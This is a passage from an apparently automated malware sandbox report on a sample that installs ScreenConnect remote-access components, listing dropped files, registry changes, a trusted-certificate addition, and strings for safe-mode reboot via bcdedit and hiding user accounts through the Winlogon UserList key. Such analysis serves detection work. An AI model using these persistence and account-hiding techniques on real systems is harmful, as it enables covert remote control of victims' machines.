                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a7ee4b85-96fb-4d9a-b419-6636f94d66aa)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.2420666021.0000000005142000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3285857919.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474342978.0000000001290000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
